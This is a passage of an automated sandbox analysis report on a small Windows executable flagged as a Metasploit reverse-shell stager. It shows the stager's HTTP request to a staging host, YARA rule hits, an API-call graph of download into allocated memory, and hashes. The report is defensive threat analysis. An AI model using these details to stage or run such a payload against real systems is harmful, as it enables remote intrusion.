GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1
Host: cdn123.offseccdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Cache-Control: no-cache
2025-03-13 08:48:34 UTC  198 bytes  IN
HTTP/1.1 302 Found
Date: Thu, 13 Mar 2025 08:48:34 GMT
Server: Apache
Location: https://www.blackberry.com
Content-Length: 210
Connection: close
Content-Type: text/html; charset=iso-8859-1
2025-03-13 08:48:34 UTC  210 bytes  IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 61 63 6b 62 65 72 72 79 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.blackberry.com">here</a>.</p></body></html>


                          Target ID:0
                          Start time:04:48:30
                          Start date:13/03/2025
                          Path:C:\Users\user\Desktop\443_2003_https-df.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\443_2003_https-df.exe"
                          Imagebase:0x140000000
                          File size:7'168 bytes
                          MD5 hash:8D9C0F42BAF129D1B430A01463DD7870
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:04:48:34
                          Start date:13/03/2025
                          Path:C:\Windows\System32\WerFault.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812
                          Imagebase:0x7ff6099a0000
                          File size:570'736 bytes
                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Execution Graph

                          Execution Coverage

                          Dynamic/Packed Code Coverage

                          Signature Coverage

                          Execution Coverage:34.2%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:12
                          Total number of Limit Nodes:1
Execution graph nodes (node id: address, API call)
52: 140004161 InternetOpenA
53: 140004186
59: 140004245 HttpOpenRequestA
62: 140004272
60: 1400042f4 VirtualAlloc
61: 140004319 InternetReadFile
63: 140004347
54: 14000424b HttpOpenRequestA
57: 140004272
55: 1400042f4 VirtualAlloc
56: 140004319 InternetReadFile
58: 140004347
Execution graph edges: 52->53, 59->62, 60->61, 61->62, 62->60, 62->61, 62->63, 54->57, 55->56, 56->57, 57->55, 57->56, 57->58

                          Callgraph

Callgraph nodes (node id: function)
0: Function_0000000140004161
1: Function_0000000140004245
2: Function_000000014000424B
3: Function_0000000140004000

                          Executed Functions

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1160841015.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_140000000_443_2003_https-df.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocFileInternetReadVirtual
                          • String ID:
                          • API String ID: 3591508208-0
                          • Opcode ID: d12b91be1f377b51e2d5e9a127600f2aa2d3ef4ff5cd3ffab96600ccc3195469
                          • Instruction ID: 00beb425c6c815f18323cc53832ec41728588e8003292604363aacf73a5263bb
                          • Opcode Fuzzy Hash: d12b91be1f377b51e2d5e9a127600f2aa2d3ef4ff5cd3ffab96600ccc3195469
                          • Instruction Fuzzy Hash: E11125F130028959FB1393A7BE36BF911486B48FC4F894020BF055B6E2F9288690824C

                          Control-flow Graph

                          APIs
                          • HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000,?,00000000), ref: 000000014000426A
                            • Part of subcall function 00000001400042B6: VirtualAlloc.KERNELBASE ref: 0000000140004310
                            • Part of subcall function 00000001400042B6: InternetReadFile.WININET(00000000,00000000), ref: 0000000140004333
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1160841015.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_140000000_443_2003_https-df.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                          • String ID: A$U.;
                          • API String ID: 1187293180-4043418643
                          • Opcode ID: b63501966926f8b01a0b9fc76b6447a0cee4866ebbb465211c8b40e6c4fe0d8d
                          • Instruction ID: be4982e0a486cb758df7c19ec863a11ba1af1556f481e9f2047e650850e32e87
                          • Opcode Fuzzy Hash: b63501966926f8b01a0b9fc76b6447a0cee4866ebbb465211c8b40e6c4fe0d8d
                          • Instruction Fuzzy Hash: A001F5F23002886DF712C6B7A921FBD2715B359FD0F8E5060BF055B6E2E9189A448209

                          Control-flow Graph

                          APIs
                          • HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000,?,00000000), ref: 000000014000426A
                            • Part of subcall function 00000001400042B6: VirtualAlloc.KERNELBASE ref: 0000000140004310
                            • Part of subcall function 00000001400042B6: InternetReadFile.WININET(00000000,00000000), ref: 0000000140004333
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1160841015.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_140000000_443_2003_https-df.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                          • String ID: U.;
                          • API String ID: 1187293180-4213443877
                          • Opcode ID: 29627bb30cf452fdd34bce20e3faa6157c3b1128fe2c696f56fdbffadd6dbd22
                          • Instruction ID: 5f6e67efc3cbf756900b841172bea2473cedc1d77852a62045df7e1721ddbbb2
                          • Opcode Fuzzy Hash: 29627bb30cf452fdd34bce20e3faa6157c3b1128fe2c696f56fdbffadd6dbd22
                          • Instruction Fuzzy Hash: 0B0126F13002486CFB12C2B76D22FFD26587399FD4F8D5120BF064B6E2F9188A44410D

                          Control-flow Graph

Control-flow graph nodes (node id: address range, API call)
32: 140004161-140004181 InternetOpenA, call 14000418f
34: 140004186-14000419a
Control-flow graph edges: 32->34
                          APIs
                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?,00000000), ref: 000000014000417F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000000.00000002.1160841015.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_140000000_443_2003_https-df.jbxd
                          Yara matches
                          Similarity
                          • API ID: InternetOpen
                          • String ID: good.com
                          • API String ID: 2038078732-2365120828
                          • Opcode ID: 7253203620dcd85dad3777c5ea19a150f91156b95e1f59e9db5f4b304c0b6218
                          • Instruction ID: 0dc344e9eccd43810a061d402c5a282636e792987776bae9b9dd0be3df35d1d3
                          • Opcode Fuzzy Hash: 7253203620dcd85dad3777c5ea19a150f91156b95e1f59e9db5f4b304c0b6218
                          • Instruction Fuzzy Hash: 1EE0C2B31483C11BF35297A86B71BCD3B25AB17F44F089026AF4043282EA151AA4C105